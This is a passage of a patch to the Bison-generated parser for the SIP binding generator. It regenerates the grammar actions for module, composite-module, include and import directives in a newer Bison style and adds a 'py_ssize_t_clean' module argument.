(yyvsp[(1) - (3)].consmodule); ++ case 184: /* consmodule_arg_list: consmodule_arg_list ',' consmodule_arg */ ++#line 1762 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-2].consmodule); + +- switch ((yyvsp[(3) - (3)].consmodule).token) ++ switch ((yyvsp[0].consmodule).token) + { +- case TK_NAME: (yyval.consmodule).name = (yyvsp[(3) - (3)].consmodule).name; break; ++ case TK_NAME: (yyval.consmodule).name = (yyvsp[0].consmodule).name; break; + } + } ++#line 4103 "../parser.c" + break; + +- case 185: +-#line 1771 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 185: /* consmodule_arg: TK_NAME '=' dottedname */ ++#line 1772 "parser.y" ++ { + (yyval.consmodule).token = TK_NAME; + +- (yyval.consmodule).name = (yyvsp[(3) - (3)].text); ++ (yyval.consmodule).name = (yyvsp[0].text); + } ++#line 4113 "../parser.c" + 
break; + +- case 186: +-#line 1778 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 186: /* consmodule_body: %empty */ ++#line 1779 "parser.y" ++ { + (yyval.consmodule).token = 0; + (yyval.consmodule).docstring = NULL; + } ++#line 4122 "../parser.c" + break; + +- case 187: +-#line 1782 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(2) - (4)].consmodule); ++ case 187: /* consmodule_body: '{' consmodule_body_directives '}' ';' */ ++#line 1783 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-2].consmodule); + } ++#line 4130 "../parser.c" + break; + +- case 189: +-#line 1788 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(1) - (2)].consmodule); ++ case 189: /* consmodule_body_directives: consmodule_body_directives consmodule_body_directive */ ++#line 1789 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-1].consmodule); + +- switch ((yyvsp[(2) - (2)].consmodule).token) ++ switch ((yyvsp[0].consmodule).token) + { +- case TK_DOCSTRING: (yyval.consmodule).docstring = (yyvsp[(2) - (2)].consmodule).docstring; break; ++ case TK_DOCSTRING: (yyval.consmodule).docstring = (yyvsp[0].consmodule).docstring; break; + } + } ++#line 4143 "../parser.c" + break; + +- case 190: +-#line 1798 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 190: /* consmodule_body_directive: ifstart */ ++#line 1799 "parser.y" ++ { + (yyval.consmodule).token = TK_IF; + } ++#line 4151 "../parser.c" + break; + +- case 191: +-#line 1801 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 191: /* consmodule_body_directive: ifend */ ++#line 1802 "parser.y" ++ { + (yyval.consmodule).token = TK_END; + } ++#line 4159 "../parser.c" + break; + +- case 192: +-#line 1804 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 192: /* consmodule_body_directive: docstring */ ++#line 1805 "parser.y" ++ { + if (notSkipping()) + { + (yyval.consmodule).token = TK_DOCSTRING; +- (yyval.consmodule).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.consmodule).docstring = 
(yyvsp[0].docstr); + } + else + { +@@ -4470,11 +4172,12 @@ yyreduce: + (yyval.consmodule).docstring = NULL; + } + } ++#line 4176 "../parser.c" + break; + +- case 193: +-#line 1818 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 193: /* compmodule: TK_COMPOMODULE compmodule_args compmodule_body */ ++#line 1819 "parser.y" ++ { + if (notSkipping()) + { + /* Make sure this is the first mention of a module. */ +@@ -4484,99 +4187,109 @@ yyreduce: + if (currentModule->fullname != NULL) + yyerror("%CompositeModule must appear before any %Module directive"); + +- setModuleName(currentSpec, currentModule, (yyvsp[(2) - (3)].compmodule).name); +- currentModule->docstring = (yyvsp[(3) - (3)].compmodule).docstring; ++ setModuleName(currentSpec, currentModule, (yyvsp[-1].compmodule).name); ++ currentModule->docstring = (yyvsp[0].compmodule).docstring; + + setIsComposite(currentModule); + } + } ++#line 4197 "../parser.c" + break; + +- case 194: +-#line 1836 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 194: /* compmodule_args: dottedname */ ++#line 1837 "parser.y" ++ { + resetLexerState(); + +- (yyval.compmodule).name = (yyvsp[(1) - (1)].text); ++ (yyval.compmodule).name = (yyvsp[0].text); + } ++#line 4207 "../parser.c" + break; + +- case 195: +-#line 1841 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(2) - (3)].compmodule); ++ case 195: /* compmodule_args: '(' compmodule_arg_list ')' */ ++#line 1842 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-1].compmodule); + } ++#line 4215 "../parser.c" + break; + +- case 197: +-#line 1847 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(1) - (3)].compmodule); ++ case 197: /* compmodule_arg_list: compmodule_arg_list ',' compmodule_arg */ ++#line 1848 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-2].compmodule); + +- switch ((yyvsp[(3) - (3)].compmodule).token) ++ switch ((yyvsp[0].compmodule).token) + { +- case TK_NAME: (yyval.compmodule).name = (yyvsp[(3) - 
(3)].compmodule).name; break; ++ case TK_NAME: (yyval.compmodule).name = (yyvsp[0].compmodule).name; break; + } + } ++#line 4228 "../parser.c" + break; + +- case 198: +-#line 1857 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 198: /* compmodule_arg: TK_NAME '=' dottedname */ ++#line 1858 "parser.y" ++ { + (yyval.compmodule).token = TK_NAME; + +- (yyval.compmodule).name = (yyvsp[(3) - (3)].text); ++ (yyval.compmodule).name = (yyvsp[0].text); + } ++#line 4238 "../parser.c" + break; + +- case 199: +-#line 1864 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 199: /* compmodule_body: %empty */ ++#line 1865 "parser.y" ++ { + (yyval.compmodule).token = 0; + (yyval.compmodule).docstring = NULL; + } ++#line 4247 "../parser.c" + break; + +- case 200: +-#line 1868 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(2) - (4)].compmodule); ++ case 200: /* compmodule_body: '{' compmodule_body_directives '}' ';' */ ++#line 1869 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-2].compmodule); + } ++#line 4255 "../parser.c" + break; + +- case 202: +-#line 1874 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(1) - (2)].compmodule); ++ case 202: /* compmodule_body_directives: compmodule_body_directives compmodule_body_directive */ ++#line 1875 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-1].compmodule); + +- switch ((yyvsp[(2) - (2)].compmodule).token) ++ switch ((yyvsp[0].compmodule).token) + { +- case TK_DOCSTRING: (yyval.compmodule).docstring = (yyvsp[(2) - (2)].compmodule).docstring; break; ++ case TK_DOCSTRING: (yyval.compmodule).docstring = (yyvsp[0].compmodule).docstring; break; + } + } ++#line 4268 "../parser.c" + break; + +- case 203: +-#line 1884 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 203: /* compmodule_body_directive: ifstart */ ++#line 1885 "parser.y" ++ { + (yyval.compmodule).token = TK_IF; + } ++#line 4276 "../parser.c" + break; + +- case 204: +-#line 1887 "sip-4.19.23/sipgen/metasrc/parser.y" +- { 
++ case 204: /* compmodule_body_directive: ifend */ ++#line 1888 "parser.y" ++ { + (yyval.compmodule).token = TK_END; + } ++#line 4284 "../parser.c" + break; + +- case 205: +-#line 1890 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 205: /* compmodule_body_directive: docstring */ ++#line 1891 "parser.y" ++ { + if (notSkipping()) + { + (yyval.compmodule).token = TK_DOCSTRING; +- (yyval.compmodule).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.compmodule).docstring = (yyvsp[0].docstr); + } + else + { +@@ -4584,107 +4297,119 @@ yyreduce: + (yyval.compmodule).docstring = NULL; + } + } ++#line 4301 "../parser.c" + break; + +- case 206: +-#line 1904 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].module).name == NULL) ++ case 206: /* module: TK_MODULE module_args module_body */ ++#line 1905 "parser.y" ++ { ++ if ((yyvsp[-1].module).name == NULL) + yyerror("%Module must have a 'name' argument"); + + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, +- currentContext.filename, (yyvsp[(2) - (3)].module).name, (yyvsp[(2) - (3)].module).c_module, +- (yyvsp[(2) - (3)].module).kwargs, (yyvsp[(2) - (3)].module).use_arg_names, (yyvsp[(2) - (3)].module).use_limited_api, +- (yyvsp[(2) - (3)].module).call_super_init, (yyvsp[(2) - (3)].module).all_raise_py_exc, +- (yyvsp[(2) - (3)].module).def_error_handler, (yyvsp[(3) - (3)].module).docstring); +- } ++ currentContext.filename, (yyvsp[-1].module).name, (yyvsp[-1].module).c_module, ++ (yyvsp[-1].module).kwargs, (yyvsp[-1].module).use_arg_names, (yyvsp[-1].module).py_ssize_t_clean, ++ (yyvsp[-1].module).use_limited_api, (yyvsp[-1].module).call_super_init, ++ (yyvsp[-1].module).all_raise_py_exc, (yyvsp[-1].module).def_error_handler, ++ (yyvsp[0].module).docstring); ++ } ++#line 4318 "../parser.c" + break; + +- case 207: +-#line 1915 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 207: /* module: TK_CMODULE dottedname optnumber */ ++#line 1917 "parser.y" ++ { + 
deprecated("%CModule is deprecated, use %Module and the 'language' argument instead"); + + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, +- currentContext.filename, (yyvsp[(2) - (3)].text), TRUE, defaultKwArgs, +- FALSE, FALSE, -1, FALSE, NULL, NULL); ++ currentContext.filename, (yyvsp[-1].text), TRUE, defaultKwArgs, ++ FALSE, FALSE, FALSE, -1, FALSE, NULL, NULL); + } ++#line 4331 "../parser.c" + break; + +- case 208: +-#line 1925 "sip-4.19.23/sipgen/metasrc/parser.y" +- {resetLexerState();} ++ case 208: /* $@8: %empty */ ++#line 1927 "parser.y" ++ {resetLexerState();} ++#line 4337 "../parser.c" + break; + +- case 209: +-#line 1925 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(3) - (3)].number) >= 0) ++ case 209: /* module_args: dottedname $@8 optnumber */ ++#line 1927 "parser.y" ++ { ++ if ((yyvsp[0].number) >= 0) + deprecated("%Module version number should be specified using the 'version' argument"); + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; +- (yyval.module).name = (yyvsp[(1) - (3)].text); ++ (yyval.module).name = (yyvsp[-2].text); + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4356 "../parser.c" + break; + +- case 210: +-#line 1938 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(2) - (3)].module); ++ case 210: /* module_args: '(' module_arg_list ')' */ ++#line 1941 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-1].module); + } ++#line 4364 "../parser.c" + break; + +- case 212: +-#line 1944 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(1) - (3)].module); ++ case 212: /* module_arg_list: module_arg_list ',' module_arg */ ++#line 1947 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-2].module); + +- switch ((yyvsp[(3) - 
(3)].module).token) ++ switch ((yyvsp[0].module).token) + { +- case TK_KWARGS: (yyval.module).kwargs = (yyvsp[(3) - (3)].module).kwargs; break; +- case TK_LANGUAGE: (yyval.module).c_module = (yyvsp[(3) - (3)].module).c_module; break; +- case TK_NAME: (yyval.module).name = (yyvsp[(3) - (3)].module).name; break; +- case TK_USEARGNAMES: (yyval.module).use_arg_names = (yyvsp[(3) - (3)].module).use_arg_names; break; +- case TK_USELIMITEDAPI: (yyval.module).use_limited_api = (yyvsp[(3) - (3)].module).use_limited_api; break; +- case TK_ALLRAISEPYEXC: (yyval.module).all_raise_py_exc = (yyvsp[(3) - (3)].module).all_raise_py_exc; break; +- case TK_CALLSUPERINIT: (yyval.module).call_super_init = (yyvsp[(3) - (3)].module).call_super_init; break; +- case TK_DEFERRORHANDLER: (yyval.module).def_error_handler = (yyvsp[(3) - (3)].module).def_error_handler; break; ++ case TK_KWARGS: (yyval.module).kwargs = (yyvsp[0].module).kwargs; break; ++ case TK_LANGUAGE: (yyval.module).c_module = (yyvsp[0].module).c_module; break; ++ case TK_NAME: (yyval.module).name = (yyvsp[0].module).name; break; ++ case TK_USEARGNAMES: (yyval.module).use_arg_names = (yyvsp[0].module).use_arg_names; break; ++ case TK_PYSSIZETCLEAN: (yyval.module).py_ssize_t_clean = (yyvsp[0].module).py_ssize_t_clean; break; ++ case TK_USELIMITEDAPI: (yyval.module).use_limited_api = (yyvsp[0].module).use_limited_api; break; ++ case TK_ALLRAISEPYEXC: (yyval.module).all_raise_py_exc = (yyvsp[0].module).all_raise_py_exc; break; ++ case TK_CALLSUPERINIT: (yyval.module).call_super_init = (yyvsp[0].module).call_super_init; break; ++ case TK_DEFERRORHANDLER: (yyval.module).def_error_handler = (yyvsp[0].module).def_error_handler; break; + } + } ++#line 4385 "../parser.c" + break; + +- case 213: +-#line 1961 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 213: /* module_arg: TK_KWARGS '=' TK_STRING_VALUE */ ++#line 1965 "parser.y" ++ { + (yyval.module).token = TK_KWARGS; + + (yyval.module).c_module = FALSE; +- (yyval.module).kwargs 
= convertKwArgs((yyvsp[(3) - (3)].text)); ++ (yyval.module).kwargs = convertKwArgs((yyvsp[0].text)); + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4403 "../parser.c" + break; + +- case 214: +-#line 1973 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 214: /* module_arg: TK_LANGUAGE '=' TK_STRING_VALUE */ ++#line 1978 "parser.y" ++ { + (yyval.module).token = TK_LANGUAGE; + +- if (strcmp((yyvsp[(3) - (3)].text), "C++") == 0) ++ if (strcmp((yyvsp[0].text), "C++") == 0) + (yyval.module).c_module = FALSE; +- else if (strcmp((yyvsp[(3) - (3)].text), "C") == 0) ++ else if (strcmp((yyvsp[0].text), "C") == 0) + (yyval.module).c_module = TRUE; + else + yyerror("%Module 'language' argument must be either \"C++\" or \"C\""); +@@ -4692,115 +4417,147 @@ yyreduce: + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4427 "../parser.c" + break; + +- case 215: +-#line 1991 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 215: /* module_arg: TK_NAME '=' dottedname */ ++#line 1997 "parser.y" ++ { + (yyval.module).token = TK_NAME; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; +- (yyval.module).name = (yyvsp[(3) - (3)].text); ++ (yyval.module).name = (yyvsp[0].text); + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4445 
"../parser.c" + break; + +- case 216: +-#line 2003 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 216: /* module_arg: TK_USEARGNAMES '=' bool_value */ ++#line 2010 "parser.y" ++ { + (yyval.module).token = TK_USEARGNAMES; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; +- (yyval.module).use_arg_names = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).use_arg_names = (yyvsp[0].boolean); ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4463 "../parser.c" + break; + +- case 217: +-#line 2015 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 217: /* module_arg: TK_PYSSIZETCLEAN '=' bool_value */ ++#line 2023 "parser.y" ++ { ++ (yyval.module).token = TK_PYSSIZETCLEAN; ++ ++ (yyval.module).c_module = FALSE; ++ (yyval.module).kwargs = defaultKwArgs; ++ (yyval.module).name = NULL; ++ (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = (yyvsp[0].boolean); ++ (yyval.module).use_limited_api = FALSE; ++ (yyval.module).all_raise_py_exc = FALSE; ++ (yyval.module).call_super_init = -1; ++ (yyval.module).def_error_handler = NULL; ++ } ++#line 4481 "../parser.c" ++ break; ++ ++ case 218: /* module_arg: TK_USELIMITEDAPI '=' bool_value */ ++#line 2036 "parser.y" ++ { + (yyval.module).token = TK_USELIMITEDAPI; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; +- (yyval.module).use_limited_api = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).py_ssize_t_clean = FALSE; ++ (yyval.module).use_limited_api = (yyvsp[0].boolean); + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4499 "../parser.c" + break; + +- case 218: +-#line 2027 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 219: /* module_arg: TK_ALLRAISEPYEXC '=' bool_value */ ++#line 2049 "parser.y" ++ { + (yyval.module).token = TK_ALLRAISEPYEXC; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; +- (yyval.module).all_raise_py_exc = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).all_raise_py_exc = (yyvsp[0].boolean); + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4517 "../parser.c" + break; + +- case 219: +-#line 2039 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 220: /* module_arg: TK_CALLSUPERINIT '=' bool_value */ ++#line 2062 "parser.y" ++ { + (yyval.module).token = TK_CALLSUPERINIT; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; +- (yyval.module).call_super_init = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).call_super_init = (yyvsp[0].boolean); + (yyval.module).def_error_handler = NULL; + } ++#line 4535 "../parser.c" + break; + +- case 220: +-#line 2051 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 221: /* module_arg: TK_DEFERRORHANDLER '=' TK_NAME_VALUE */ ++#line 2075 "parser.y" ++ { + (yyval.module).token = TK_DEFERRORHANDLER; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; +- (yyval.module).def_error_handler = (yyvsp[(3) - (3)].text); ++ (yyval.module).def_error_handler = (yyvsp[0].text); + } 
++#line 4553 "../parser.c" + break; + +- case 221: +-#line 2063 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 222: /* module_arg: TK_VERSION '=' TK_NUMBER_VALUE */ ++#line 2088 "parser.y" ++ { + deprecated("%Module version numbers are deprecated and ignored"); + +- if ((yyvsp[(3) - (3)].number) < 0) ++ if ((yyvsp[0].number) < 0) + yyerror("%Module 'version' argument cannot be negative"); + + (yyval.module).token = TK_VERSION; +@@ -4809,68 +4566,76 @@ yyreduce: + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4576 "../parser.c" + break; + +- case 222: +-#line 2082 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 223: /* module_body: %empty */ ++#line 2108 "parser.y" ++ { + (yyval.module).token = 0; + (yyval.module).docstring = NULL; + } ++#line 4585 "../parser.c" + break; + +- case 223: +-#line 2086 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(2) - (4)].module); ++ case 224: /* module_body: '{' module_body_directives '}' ';' */ ++#line 2112 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-2].module); + } ++#line 4593 "../parser.c" + break; + +- case 225: +-#line 2092 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(1) - (2)].module); ++ case 226: /* module_body_directives: module_body_directives module_body_directive */ ++#line 2118 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-1].module); + +- switch ((yyvsp[(2) - (2)].module).token) ++ switch ((yyvsp[0].module).token) + { +- case TK_DOCSTRING: (yyval.module).docstring = (yyvsp[(2) - (2)].module).docstring; break; ++ case TK_DOCSTRING: (yyval.module).docstring = (yyvsp[0].module).docstring; break; + } + } ++#line 4606 "../parser.c" + break; + +- case 226: +-#line 2102 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 227: /* module_body_directive: ifstart */ ++#line 2128 "parser.y" ++ { + (yyval.module).token = TK_IF; + } ++#line 4614 "../parser.c" + break; + +- case 227: +-#line 2105 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 228: /* module_body_directive: ifend */ ++#line 2131 "parser.y" ++ { + (yyval.module).token = TK_END; + } ++#line 4622 "../parser.c" + break; + +- case 228: +-#line 2108 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 229: /* module_body_directive: autopyname */ ++#line 2134 "parser.y" ++ { + (yyval.module).token = TK_AUTOPYNAME; + } ++#line 4630 "../parser.c" + break; + +- case 229: +-#line 2111 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 230: /* module_body_directive: docstring */ ++#line 2137 "parser.y" ++ { + if (notSkipping()) + { + (yyval.module).token = TK_DOCSTRING; +- (yyval.module).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.module).docstring = (yyvsp[0].docstr); + } + else + { +@@ -4878,11 +4643,12 @@ yyreduce: + (yyval.module).docstring = NULL; + } + } ++#line 4647 "../parser.c" + break; + +- case 231: +-#line 2126 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 232: /* dottedname: TK_PATH_VALUE */ ++#line 2152 "parser.y" ++ { + /* + * The grammar design is a bit broken and this is the easiest way + * to allow periods in names. +@@ -4890,435 +4656,487 @@ yyreduce: + + char *cp; + +- for (cp = (yyvsp[(1) - (1)].text); *cp != '\0'; ++cp) ++ for (cp = (yyvsp[0].text); *cp != '\0'; ++cp) + if (*cp != '.' 
&& *cp != '_' && !isalnum(*cp)) + yyerror("Invalid character in name"); + +- (yyval.text) = (yyvsp[(1) - (1)].text); ++ (yyval.text) = (yyvsp[0].text); + } ++#line 4666 "../parser.c" + break; + +- case 232: +-#line 2142 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 233: /* optnumber: %empty */ ++#line 2168 "parser.y" ++ { + (yyval.number) = -1; + } ++#line 4674 "../parser.c" + break; + +- case 234: +-#line 2148 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (2)].include).name == NULL) ++ case 235: /* include: TK_INCLUDE include_args */ ++#line 2174 "parser.y" ++ { ++ if ((yyvsp[0].include).name == NULL) + yyerror("%Include must have a 'name' argument"); + + if (notSkipping()) +- parseFile(NULL, (yyvsp[(2) - (2)].include).name, NULL, (yyvsp[(2) - (2)].include).optional); ++ parseFile(NULL, (yyvsp[0].include).name, NULL, (yyvsp[0].include).optional); + } ++#line 4686 "../parser.c" + break; + +- case 235: +-#line 2157 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 236: /* include_args: TK_PATH_VALUE */ ++#line 2183 "parser.y" ++ { + resetLexerState(); + +- (yyval.include).name = (yyvsp[(1) - (1)].text); ++ (yyval.include).name = (yyvsp[0].text); + (yyval.include).optional = FALSE; + } ++#line 4697 "../parser.c" + break; + +- case 236: +-#line 2163 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.include) = (yyvsp[(2) - (3)].include); ++ case 237: /* include_args: '(' include_arg_list ')' */ ++#line 2189 "parser.y" ++ { ++ (yyval.include) = (yyvsp[-1].include); + } ++#line 4705 "../parser.c" + break; + +- case 238: +-#line 2169 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.include) = (yyvsp[(1) - (3)].include); ++ case 239: /* include_arg_list: include_arg_list ',' include_arg */ ++#line 2195 "parser.y" ++ { ++ (yyval.include) = (yyvsp[-2].include); + +- switch ((yyvsp[(3) - (3)].include).token) ++ switch ((yyvsp[0].include).token) + { +- case TK_NAME: (yyval.include).name = (yyvsp[(3) - (3)].include).name; break; +- case 
TK_OPTIONAL: (yyval.include).optional = (yyvsp[(3) - (3)].include).optional; break; ++ case TK_NAME: (yyval.include).name = (yyvsp[0].include).name; break; ++ case TK_OPTIONAL: (yyval.include).optional = (yyvsp[0].include).optional; break; + } + } ++#line 4719 "../parser.c" + break; + +- case 239: +-#line 2180 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 240: /* include_arg: TK_NAME '=' TK_PATH_VALUE */ ++#line 2206 "parser.y" ++ { + (yyval.include).token = TK_NAME; + +- (yyval.include).name = (yyvsp[(3) - (3)].text); ++ (yyval.include).name = (yyvsp[0].text); + (yyval.include).optional = FALSE; + } ++#line 4730 "../parser.c" + break; + +- case 240: +-#line 2186 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 241: /* include_arg: TK_OPTIONAL '=' bool_value */ ++#line 2212 "parser.y" ++ { + (yyval.include).token = TK_OPTIONAL; + + (yyval.include).name = NULL; +- (yyval.include).optional = (yyvsp[(3) - (3)].boolean); ++ (yyval.include).optional = (yyvsp[0].boolean); + } ++#line 4741 "../parser.c" + break; + +- case 241: +-#line 2194 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 242: /* optinclude: TK_OPTINCLUDE TK_PATH_VALUE */ ++#line 2220 "parser.y" ++ { + deprecated("%OptionalInclude is deprecated, use %Include and the 'optional' argument instead"); + + if (notSkipping()) +- parseFile(NULL, (yyvsp[(2) - (2)].text), NULL, TRUE); ++ parseFile(NULL, (yyvsp[0].text), NULL, TRUE); + } ++#line 4752 "../parser.c" + break; + +- case 242: +-#line 2202 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 243: /* import: TK_IMPORT import_args */ ++#line 2228 "parser.y" ++ { + if (notSkipping()) +- newImport((yyvsp[(2) - (2)].import).name); ++ newImport((yyvsp[0].import).name); + } ++#line 4761 "../parser.c" + break; + +- case 243: +-#line 2208 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 244: /* import_args: TK_PATH_VALUE */ ++#line 2234 "parser.y" ++ { + resetLexerState(); + +- (yyval.import).name = (yyvsp[(1) - (1)].text); ++ (yyval.import).name = 
(yyvsp[0].text); + } ++#line 4771 "../parser.c" + break; + +- case 244: +-#line 2213 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.import) = (yyvsp[(2) - (3)].import); ++ case 245: /* import_args: '(' import_arg_list ')' */ ++#line 2239 "parser.y" ++ { ++ (yyval.import) = (yyvsp[-1].import); + } ++#line 4779 "../parser.c" + break; + +- case 246: +-#line 2219 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.import) = (yyvsp[(1) - (3)].import); ++ case 247: /* import_arg_list: import_arg_list ',' import_arg */ ++#line 2245 "parser.y" ++ { ++ (yyval.import) = (yyvsp[-2].import); + +- switch ((yyvsp[(3) - (3)].import).token) ++ switch ((yyvsp[0].import).token) + { +- case TK_NAME: (yyval.import).name = (yyvsp[(3) - (3)].import).name; break; ++ case TK_NAME: (yyval.import).name = (yyvsp[0].import).name; break; + } + } ++#line 4792 "../parser.c" + break; + +- case 247: +-#line 2229 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 248: /* import_arg: TK_NAME '=' TK_PATH_VALUE */ ++#line 2255 "parser.y" ++ { + (yyval.import).token = TK_NAME; + +- (yyval.import).name = (yyvsp[(3) - (3)].text); ++ (yyval.import).name = (yyvsp[0].text); + } ++#line 4802 "../parser.c" + break; + +- case 248: +-#line 2236 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 249: /* optaccesscode: %empty */ ++#line 2262 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 4810 "../parser.c" + break; + +- case 249: +-#line 2239 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 250: /* 